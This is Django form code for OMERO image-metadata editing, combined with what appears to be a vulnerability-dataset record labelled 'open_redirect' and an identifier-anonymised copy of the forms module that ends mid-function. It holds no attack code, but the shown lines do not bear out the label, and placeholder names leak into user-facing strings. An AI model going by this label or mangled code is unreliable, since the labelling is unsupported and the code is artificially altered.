                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "offsetValue"),
                        }
                    ),
                    initial=detector.offsetValue,
                    label="Offset",
                    required=False,
                )
            else:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "offsetValue"),
                        }
                    ),
                    label="Offset",
                    required=False,
                )
            set_widget_attrs(self.fields["offsetValue"])
        except Exception:
            self.fields["offsetValue"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Offset",
                required=False,
            )
            set_widget_attrs(self.fields["offsetValue"])
        # Zoom
        try:
            if detector is not None:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fixed copy-paste bug: previously saved under
                            # "voltage", clobbering the voltage value when the
                            # zoom field was edited.
                            "onchange": save_metadata(detector.id, "zoom"),
                        }
                    ),
                    initial=detector.zoom,
                    required=False,
                )
            else:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "zoom"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["zoom"])
        except Exception:
            self.fields["zoom"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["zoom"])
        # Amplification gain
        try:
            if detector is not None:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "amplificationGain"),
                        }
                    ),
                    initial=detector.amplificationGain,
                    label="Amplification gain",
                    required=False,
                )
            else:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "amplificationGain"),
                        }
                    ),
                    label="Amplification gain",
                    required=False,
                )
            set_widget_attrs(self.fields["amplificationGain"])
        except Exception:
            self.fields["amplificationGain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Amplification gain",
                required=False,
            )
            set_widget_attrs(self.fields["amplificationGain"])
        # Read out rate
        try:
            if detSet is not None and detSet.readOutRate is not None:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "readOutRate"),
                        }
                    ),
                    initial=detSet.readOutRate.getValue(),
                    label=("Read out rate (%s)" % detSet.readOutRate.getSymbol()),
                    required=False,
                )
            else:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "readOutRate"),
                        }
                    ),
                    label="Read out rate",
                    required=False,
                )
            set_widget_attrs(self.fields["readOutRate"])
        except Exception:
            self.fields["readOutRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Read out rate",
                required=False,
            )
            set_widget_attrs(self.fields["readOutRate"])
        # Binning (Binning enumeration select)
        try:
            if detSet is not None:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            # Fixed copy-paste bug: previously saved under
                            # "type" (the detector-type key) instead of
                            # "binning".
                            "onchange": save_metadata(detSet.id, "binning", options=True)
                        }
                    ),
                    initial=detSet.getBinning().value,
                    required=False,
                )
            else:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(detSet.id, "binning", options=True)
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["binning"])
        except Exception:
            self.fields["binning"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["binning"])

        # Fix the display order of the fields (legacy Django keyOrder).
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "gain",
            "voltage",
            "offsetValue",
            "zoom",
            "amplificationGain",
            "readOutRate",
            "binning",
        ]
class MetadataLightSourceForm(forms.Form):
    """Read/edit form for LightSource (and optional LightSourceSettings) metadata.

    Built from ``kwargs["initial"]["lightSource"]`` (the LightSource wrapper;
    its concrete OMERO class is recorded on ``self.lightSourceType``) and,
    when present, ``kwargs["initial"]["lightSourceSettings"]``. Laser-only
    attributes (pump, medium, wavelength, pulse, etc.) fall back to read-only
    "N/A" placeholders when the underlying accessor raises for a non-Laser
    source. Enumeration querysets come from ``kwargs["initial"]["lstypes"]``,
    ``["mediums"]`` and ``["pulses"]``.
    """

    BOOLEAN_CHOICES = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *args, **kwargs):
        super(MetadataLightSourceForm, self).__init__(*args, **kwargs)
        lightSource = kwargs["initial"]["lightSource"]
        lightSourceSettings = None
        if "lightSourceSettings" in kwargs["initial"]:
            lightSourceSettings = kwargs["initial"]["lightSourceSettings"]

        self.lightSourceType = lightSource.OMERO_CLASS

        # Manufacturer
        try:
            if lightSource.manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fixed copy-paste bug: previously saved under
                            # "model", clobbering the model value when the
                            # manufacturer field was edited.
                            "onchange": save_metadata(lightSource.id, "manufacturer"),
                        }
                    ),
                    initial=lightSource.manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "manufacturer"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if lightSource.model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "model"),
                        }
                    ),
                    initial=lightSource.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "model"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Serial Number
        try:
            if lightSource.serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "serialNumber"),
                        }
                    ),
                    initial=lightSource.serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "serialNumber"),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot Number
        try:
            if lightSource.lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "lotNumber"),
                        }
                    ),
                    initial=lightSource.lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "lotNumber"),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Power
        try:
            if lightSource.power is not None:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "power"),
                        }
                    ),
                    initial=lightSource.power.getValue(),
                    label="Power (%s)" % lightSource.power.getSymbol(),
                    required=False,
                )
            else:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "power"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["power"])
        except Exception:
            self.fields["power"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["power"])
        # Type (LightSourceType enumeration select)
        try:
            if lightSource.getLightSourceType() is not None:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "type", options=True
                            )
                        }
                    ),
                    label="Type",
                    initial=lightSource.getLightSourceType().value,
                    required=False,
                )
            else:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "type", options=True
                            )
                        }
                    ),
                    label="Type",
                    required=False,
                )
            set_widget_attrs(self.fields["lstype"])
        except Exception:
            self.fields["lstype"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Type",
                required=False,
            )
            set_widget_attrs(self.fields["lstype"])
        # Pump (laser only)
        try:
            # Will throw exception for non-Laser lightsources.
            pump = lightSource.getPump()
            pumpType = pump.OMERO_CLASS  # E.g. 'Arc'
            pumpModel = pump.getModel()
            pumpValue = "%s: %s" % (pumpType, pumpModel)
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial=pumpValue,
                required=False,
            )
        except Exception:
            # Not a Laser - don't show Pump
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        set_widget_attrs(self.fields["pump"])
        # Medium (laser medium enumeration select)
        try:
            if lightSource.getLaserMedium() is not None:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "medium", options=True
                            )
                        }
                    ),
                    initial=lightSource.getLaserMedium().value,
                    label="Medium",
                    required=False,
                )
            else:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "medium", options=True
                            )
                        }
                    ),
                    label="Medium",
                    required=False,
                )
            set_widget_attrs(self.fields["lmedium"])
        except Exception:
            self.fields["lmedium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Medium",
                required=False,
            )
            set_widget_attrs(self.fields["lmedium"])
        # Wavelength: settings value preferred, then light-source value.
        # NOTE(review): edits are saved against lightSource.id even when the
        # displayed value comes from lightSourceSettings — confirm intended
        # (cf. attenuation below, which saves against lightSourceSettings.id).
        try:
            if (
                lightSourceSettings is not None
                and lightSourceSettings.wavelength is not None
            ):
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    initial=lightSourceSettings.wavelength.getValue(),
                    label=(
                        "Wavelength (%s)" % lightSourceSettings.wavelength.getSymbol()
                    ),
                    required=False,
                )
            elif lightSource.wavelength is not None:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    initial=lightSource.wavelength.getValue(),
                    label=("Wavelength (%s)" % lightSource.wavelength.getSymbol()),
                    required=False,
                )
            else:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["wavelength"])
        except Exception:
            self.fields["wavelength"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["wavelength"])
        # FrequencyMultiplication
        try:
            if lightSource.frequencyMultiplication is not None:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                lightSource.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    initial=lightSource.frequencyMultiplication,
                    label="Frequency Multiplication",
                    required=False,
                )
            else:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                lightSource.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    label="Frequency Multiplication",
                    required=False,
                )
            set_widget_attrs(self.fields["frequencyMultiplication"])
        except Exception:
            self.fields["frequencyMultiplication"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Frequency Multiplication",
                required=False,
            )
            set_widget_attrs(self.fields["frequencyMultiplication"])
        # Tuneable
        try:
            if lightSource.tuneable is not None:
                self.fields["tuneable"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "tuneable", options=True
                            )
                        }
                    ),
                    initial=lightSource.tuneable,
                    required=False,
                )
            else:
                self.fields["tuneable"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "tuneable", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["tuneable"])
        except Exception:
            self.fields["tuneable"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["tuneable"])
        # Pulse (Pulse enumeration select)
        # NOTE(review): initial is lightSource.pulse, not .pulse.value as the
        # other enum selects use — confirm the wrapper returns the raw value.
        try:
            if lightSource.pulse is not None:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pulse", options=True
                            )
                        }
                    ),
                    initial=lightSource.pulse,
                    required=False,
                )
            else:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pulse", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["pulse"])
        except Exception:
            self.fields["pulse"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["pulse"])
        # Repetition Rate
        try:
            if lightSource.repetitionRate is not None:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "repetitionRate"),
                        }
                    ),
                    initial=lightSource.repetitionRate.getValue(),
                    label=(
                        "Repetition rate (%s)" % lightSource.repetitionRate.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "repetitionRate"),
                        }
                    ),
                    label="Repetition rate",
                    required=False,
                )
            set_widget_attrs(self.fields["repetitionRate"])
        except Exception:
            self.fields["repetitionRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Repetition rate",
                required=False,
            )
            set_widget_attrs(self.fields["repetitionRate"])
        # Pockel Cell
        try:
            if lightSource.pockelCell is not None:
                self.fields["pockelCell"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pockelCell", options=True
                            )
                        }
                    ),
                    initial=lightSource.pockelCell,
                    label="Pockel Cell",
                    required=False,
                )
            else:
                self.fields["pockelCell"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pockelCell", options=True
                            )
                        }
                    ),
                    label="Pockel Cell",
                    required=False,
                )
            set_widget_attrs(self.fields["pockelCell"])
        except Exception:
            self.fields["pockelCell"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pockel Cell",
                required=False,
            )
            set_widget_attrs(self.fields["pockelCell"])
        # Attenuation (settings only; stored as a fraction, shown as %).
        # Note: no try/except here, unlike the fields above.
        if (
            lightSourceSettings is not None
            and lightSourceSettings.attenuation is not None
        ):
            self.fields["attenuation"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(
                    attrs={
                        "size": 25,
                        "onchange": save_metadata(
                            lightSourceSettings.id, "attenuation"
                        ),
                    }
                ),
                initial=formatPercentFraction(lightSourceSettings.attenuation),
                label="Attenuation (%)",
                required=False,
            )
        else:
            self.fields["attenuation"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        set_widget_attrs(self.fields["attenuation"])

        # Fix the display order of the fields (legacy Django keyOrder).
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "power",
            "lstype",
            "pump",
            "lmedium",
            "wavelength",
            "frequencyMultiplication",
            "tuneable",
            "pulse",
            "repetitionRate",
            "pockelCell",
            "attenuation",
        ]
class MetadataEnvironmentForm(forms.Form):
    """Edit form for an image's imaging-environment metadata.

    Builds one text field each for temperature, air pressure, humidity and
    CO2 fraction. A field is editable (with an ``onchange`` save hook) when
    the value can be read; when the imaging environment is missing or a
    value cannot be read, it degrades to a read-only "N/A" placeholder.
    The four near-identical try/if/else/except blocks of the original are
    factored into ``_add_env_field``; behavior is unchanged.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataEnvironmentForm, self).__init__(*args, **kwargs)
        image = kwargs["initial"]["image"]
        imagingEnv = image.getImagingEnvironment()
        # Temperature: unit-bearing quantity; label carries the unit symbol.
        self._add_env_field(
            image,
            "temperature",
            lambda: imagingEnv.temperature,
            lambda v: v.getValue(),
            success_label=lambda v: "Temperature (%s)" % v.getSymbol(),
        )
        # Air pressure: unit-bearing quantity; labelled in every branch.
        self._add_env_field(
            image,
            "airPressure",
            lambda: imagingEnv.airPressure,
            lambda v: v.getValue(),
            success_label=lambda v: "Air Pressure (%s)" % v.getSymbol(),
            else_label="Air Pressure",
            except_label="Air Pressure",
        )
        # Humidity: stored as a plain value, no label in any branch.
        self._add_env_field(
            image,
            "humidity",
            lambda: imagingEnv.humidity,
            lambda v: v,
        )
        # CO2 percentage: plain value, constant label in every branch.
        self._add_env_field(
            image,
            "co2percent",
            lambda: imagingEnv.co2percent,
            lambda v: v,
            success_label=lambda v: "CO2 (%)",
            else_label="CO2 (%)",
            except_label="CO2 (%)",
        )
        self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]

    def _add_env_field(
        self,
        image,
        name,
        value_cb,
        initial_cb,
        success_label=None,
        else_label=None,
        except_label=None,
    ):
        """Create one environment CharField on ``self``.

        value_cb/initial_cb/success_label are zero-/one-arg callables so the
        raising expressions stay inside the try, preserving the original
        fall-through to the "N/A" fallback on any error (e.g. imagingEnv
        is None and attribute access raises).
        """
        try:
            value = value_cb()
            widget = forms.TextInput(
                attrs={"size": 25, "onchange": save_metadata(image.id, name)}
            )
            if value is not None:
                extra = {"initial": initial_cb(value)}
                if success_label is not None:
                    extra["label"] = success_label(value)
            else:
                extra = {}
                if else_label is not None:
                    extra["label"] = else_label
            self.fields[name] = forms.CharField(
                max_length=100, widget=widget, required=False, **extra
            )
        except Exception:
            extra = {}
            if except_label is not None:
                extra["label"] = except_label
            self.fields[name] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
                **extra
            )
        set_widget_attrs(self.fields[name])
class MetadataStageLabelForm(forms.Form):
    """Edit form for an image's stage-label position (x, y, z).

    Each axis gets a text field wired to ``save_metadata`` via onchange;
    when the stage label cannot be read, the field degrades to a read-only
    "N/A" placeholder.

    BUG FIX: the original positiony except-branch called
    ``set_widget_attrs(self.fields["positionx"])`` (copy-paste), leaving
    the positiony fallback field without its disabled-widget attributes;
    the loop below applies the attrs to the field actually created.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataStageLabelForm, self).__init__(*args, **kwargs)
        image = kwargs["initial"]["image"]
        for name, label in (
            ("positionx", "Position X"),
            ("positiony", "Position Y"),
            ("positionz", "Position Z"),
        ):
            try:
                stageLabel = image.getStageLabel()
                widget = forms.TextInput(
                    attrs={"size": 25, "onchange": save_metadata(image.id, name)}
                )
                if stageLabel is not None:
                    self.fields[name] = forms.CharField(
                        max_length=100,
                        widget=widget,
                        # e.g. stageLabel.positionx for the "positionx" field
                        initial=getattr(stageLabel, name),
                        label=label,
                        required=False,
                    )
                else:
                    self.fields[name] = forms.CharField(
                        max_length=100,
                        widget=widget,
                        label=label,
                        required=False,
                    )
            except Exception:
                # Stage label unreadable: read-only placeholder.
                self.fields[name] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(attrs={"size": 25}),
                    initial="N/A",
                    label=label,
                    required=False,
                )
            set_widget_attrs(self.fields[name])
        self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| open_redirect | {
"code": [
"from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField",
"class BasketShareForm(ShareForm):",
" def __init__(self, *args, **kwargs):",
" super(BasketShareForm, self).__init__(*args, **kwargs)",
" try:",
" self.fields[\"image\"] = GroupModelMultipleChoiceField(",
" queryset=kwargs[\"initial\"][\"images\"],",
" initial=kwargs[\"initial\"][\"selected\"],",
" widget=forms.SelectMultiple(attrs={\"size\": 10}),",
" )",
" except Exception:",
" self.fields[\"image\"] = GroupModelMultipleChoiceField(",
" queryset=kwargs[\"initial\"][\"images\"],",
" widget=forms.SelectMultiple(attrs={\"size\": 10}),",
" )"
],
"line_no": [
40,
130,
131,
132,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144
]
} | {
"code": [],
"line_no": []
} |
import datetime
import logging
import time

from django import forms
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms.formsets import formset_factory

from omeroweb.custom_forms import NonASCIIForm
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction

from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import MetadataModelChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
# Module-level logger for this forms module.
VAR_0 = logging.getLogger(__name__)

# Absolute URL of the small "help" icon under the static-files root.
VAR_1 = "%swebgateway/img/help16.png" % settings.STATIC_URL

# Tooltip HTML shown next to the share "enable" checkbox.
# NOTE(review): the literal "VAR_17" in this user-facing string looks
# machine-mangled (it names a variable, not a word) — presumably "owner";
# confirm against upstream before relying on this text.
VAR_2 = (
    '<span class="tooltip" title="Enable/Disable: This option'
    ' allows the VAR_17 to keep the access control of the share.">'
    '<img src="%s" /></span>'
) % VAR_1

# Tooltip HTML shown next to the share expiry-date input.
# NOTE(review): "VAR_49" likewise appears mangled — presumably "date".
VAR_3 = (
    '<span class="tooltip" title="Expiry VAR_49: This VAR_49 defines'
    " when the share will stop being available. Date format:"
    ' YYYY-MM-DD."><img src="%s" /></span>'
) % VAR_1
class CLASS_0(NonASCIIForm):
    """Minimal form holding one short free-text input (25-char widget)."""

    VAR_10 = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class CLASS_1(NonASCIIForm):
    """Share creation/edit form: message, expiry date, enable flag, members.

    BUG FIX: ``FUNC_2`` previously built the date string with the corrupted
    format ``"%VAR_23-%s-%s"``; the invalid ``%V`` conversion raised inside
    the try, so *every* expiry date was rejected as "wrong format". Restored
    to ``"%s-%s-%s"`` (and the mangled "Expiry VAR_49" message to plain
    English).
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_1, self).__init__(*VAR_11, **VAR_12)
        try:
            # EAFP probe: a missing "shareMembers" key raises KeyError here,
            # routing us to the no-initial fallback below.
            if VAR_12["initial"]["shareMembers"]:
                pass
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=VAR_12["initial"]["experimenters"],
                initial=VAR_12["initial"]["shareMembers"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        except Exception:
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=VAR_12["initial"]["experimenters"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        self.fields.keyOrder = [
            "message",
            "expiration",
            "enable",
            "members",
        ]  # , 'guests']

    VAR_13 = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
    VAR_14 = forms.CharField(
        max_length=100,
        widget=forms.TextInput(attrs={"size": 10}),
        label="Expiry date",
        help_text=VAR_3,
        required=False,
    )
    VAR_15 = forms.BooleanField(required=False, help_text=VAR_2)

    def FUNC_2(self):
        """Validate the optional expiry date (YYYY-MM-DD, in the future)."""
        if (
            self.cleaned_data["expiration"] is not None
            and len(self.cleaned_data["expiration"]) < 1
        ):
            return None
        if self.cleaned_data["expiration"] is not None:
            parts = str(self.cleaned_data["expiration"]).rsplit("-")
            try:
                VAR_49 = datetime.datetime.strptime(
                    ("%s-%s-%s" % (parts[0], parts[1], parts[2])), "%Y-%m-%d"
                )
            except Exception:
                raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
            if time.mktime(VAR_49.timetuple()) <= time.time():
                raise forms.ValidationError("Expiry date must be in the future.")
        return self.cleaned_data["expiration"]
class CLASS_2(CLASS_1):
    """Share form whose "image" field is a multi-select over the supplied
    images, preselecting the "selected" entries when they are provided."""

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_2, self).__init__(*VAR_11, **VAR_12)
        common = {
            "queryset": VAR_12["initial"]["images"],
            "widget": forms.SelectMultiple(attrs={"size": 10}),
        }
        try:
            # Missing "selected" key (KeyError) drops to the fallback.
            self.fields["image"] = GroupModelMultipleChoiceField(
                initial=VAR_12["initial"]["selected"], **common
            )
        except Exception:
            self.fields["image"] = GroupModelMultipleChoiceField(**common)
class CLASS_3(NonASCIIForm):
    """Form with a required name, optional description and a hidden value."""

    # Required single-line name, max 250 characters.
    VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
    # Optional multi-line description.
    VAR_16 = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
    )
    # Hidden optional value, populated by the view rather than the user.
    VAR_17 = forms.CharField(widget=forms.HiddenInput, required=False)
class CLASS_4(NonASCIIForm):
    """Form with a single required name field (max 250 characters)."""

    VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class CLASS_5(NonASCIIForm):
    """Form with a single optional multi-line description field."""

    VAR_16 = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
    )
class CLASS_6(NonASCIIForm):
    """Multi-object selection form.

    For every object type present (and non-empty) in ``kwargs["initial"]``,
    adds a multi-select field, preselecting entries from
    ``initial["selected"][<key>]`` when available. The original eight
    copy-pasted try/except blocks are factored into one loop plus
    ``_add_object_field``; field creation order (and thus form order) is
    unchanged.
    """

    # (field name, initial-dict key) pairs, in the original creation order.
    _OBJECT_TYPES = (
        ("image", "images"),
        ("dataset", "datasets"),
        ("project", "projects"),
        ("screen", "screens"),
        ("plate", "plates"),
        ("acquisition", "acquisitions"),
        ("well", "wells"),
        ("share", "shares"),
    )

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_6, self).__init__(*VAR_11, **VAR_12)
        initial = VAR_12["initial"]
        for field_name, key in self._OBJECT_TYPES:
            # Same truthiness-based default as the original code.
            queryset = key in initial and initial[key] or list()
            if len(queryset) > 0:
                self._add_object_field(field_name, key, queryset, initial)

    def _add_object_field(self, field_name, key, queryset, initial):
